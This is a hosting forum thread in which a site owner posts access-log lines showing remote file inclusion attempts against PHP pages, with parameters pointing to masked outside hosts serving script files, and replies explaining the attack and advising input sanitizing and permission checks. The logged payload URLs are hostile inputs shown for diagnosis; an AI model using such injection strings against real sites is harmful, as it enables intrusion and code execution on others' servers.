Jump to content

Recommended Posts

Posted

I've noticed when looking at my latest visitors via cpanel that some of them have another site URL attached to the end of some of my pages.

 

Here's an example (I've removed the site name but if it helps, I could post it later or PM it or something):

 

/reviews/2006/index.php?view=page&pagename=http://www.**SITENAME**.com/blog/wp.rss.txt??

 

/reviews/DVD/read.php?id=http://**SITENAME2**.ru/images/cs.txt?

 

/reviews/movie/read.php?id=http://**SITENAME3**.ru/images/cs.txt?

 

/reviews/DVD/read.php?id=http://**SITENAME4**.io/pb.php?

 

Each of those are different sites.

 

When clicking on the links, it doesn't take me to those sites, just gives me my 404 error or loads a blank template (which is mine).

 

Should I be worried or is this normal?

Posted

Someone is trying to gain access your site by remotely including scripts to upload files for a number of nasty uses. For the most part we block attempts such as these but we can't always catch everything.

You should insure your scripts are secure and sanitize any data passed via a URL, also make sure you are not using any open permissions.

 

I would go ahead and open a ticket to the help desk asking for a review of your files to insure nothing has been compromised.

Posted

I just checked my MySQL Permissions and somehow the user account I created specifically to just select the data had all its permissions checked... I don't know how that happened since I have another user account I use to do all the other things.

 

I'll open a ticket and have them check and make sure everything is OK.

 

Thanks guys.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Unfortunately, your content contains terms that we do not allow. Please edit your content to remove the highlighted words below.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...